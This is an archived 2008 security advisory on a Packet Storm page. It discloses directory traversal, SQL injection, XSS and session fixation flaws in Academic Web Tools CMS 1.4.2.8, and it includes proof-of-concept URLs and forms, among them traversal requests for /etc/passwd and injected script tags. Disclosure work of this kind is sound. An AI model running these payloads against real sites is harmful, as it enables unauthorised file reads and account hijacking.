what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

academic-sqlxss.txt

academic-sqlxss.txt
Posted Jun 19, 2008
Authored by AmnPardaz Security Research Team | Site bugreport.ir

Academic Web Tools CMS versions 1.4.2.8 and below suffer from directory traversal, SQL injection, and cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss, sql injection
SHA-256 | 6bb80a0be30de3680020fc3040e0bd35081f88b007d95287198e71c7b4f21e89

academic-sqlxss.txt

Change Mirror Download
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Academic Web Tools CMS Multiple Vulnerabilities
# Vendor: www.yektaweb.com
# Vulnerable Version: 1.4.2.8 and prior versions
# Exploit: Available
# Impact: Medium
# Fix: N/A
# Original Advisory: www.bugreport.ir/?/44
###################################################################################

####################
1. Description:
####################
ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too.
####################
2. Vulnerabilities:
####################
2.1. Directory Traversal in "/download.php" in "dfile" parameter.
2.1.1. Exploit:
Check the exploit/POC section.
2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter.
2.2.1. Exploit:
Check the exploit/POC section.
2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/login.php" in URL parameters.
2.3.1. Exploit:
Check the exploit/POC section.
2.4. Cross Site Scripting (XSS). Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
2.3.1. Exploit:
Check the exploit/POC section.
2.5. Cross Site Scripting (XSS). Reflected redirect XSS attack in "/rss_getfile.php" in "file" parameters.
2.4.1. Exploit:
Check the exploit/POC section.
2.6. Cross Site Scripting (XSS). Stored XSS attack in "/room.php" chat service.
2.5.1. Exploit:
Check the exploit/POC section.
2.7. Session Management Flaw. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
2.5.1. Exploit:
Check the exploit/POC section.
####################
3. Exploits/POCs:
####################
Original Exploit URL: http://bugreport.ir/index.php?/44/exploit
3.1. Directory Traversal in "/download.php" in "dfile" parameter.
-------------
http://[URL]/download.php?dfile=../../../../../../etc/passwd
http://[URL]/download.php?dfile=../../../../../../../etc/crontab
-------------
3.2. SQL Injection in "/rating.php" in "book_id" parameter.
-------------
<form action="http://[URL]/rating.php" method="post">
<input type=text name=book_id size=100 value="[SQL Injection]"><br>
<input type=hidden name=user_score size=100 value=5>
<input type=submit name=submit_for_rating value="Go!">
</form>
-------------
3.3. Reflected XSS attack in "/login.php" in URL parameters.
-------------
http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script>
-------------
3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
-------------
http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script>
-------------
3.5. Reflected redirect XSS attack in "rss_getfile.php" in "file" parameters.
-------------
http://[URL]/rss_getfile.php?file=http://BugReport.ir
-------------
3.6. Reflected XSS attack in "room.php".
-------------
First of all, login into the site.
Now submit this : <iframe src="http://www.BugReport.ir/" width=1000 height=1000></iframe>
at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1
-------------
3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
-------------
First, clear the site's cookies, and then goto:
http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation
http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation
-------------
####################
4. Solution:
####################
Source codes are encrypted. Wait for vendor patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close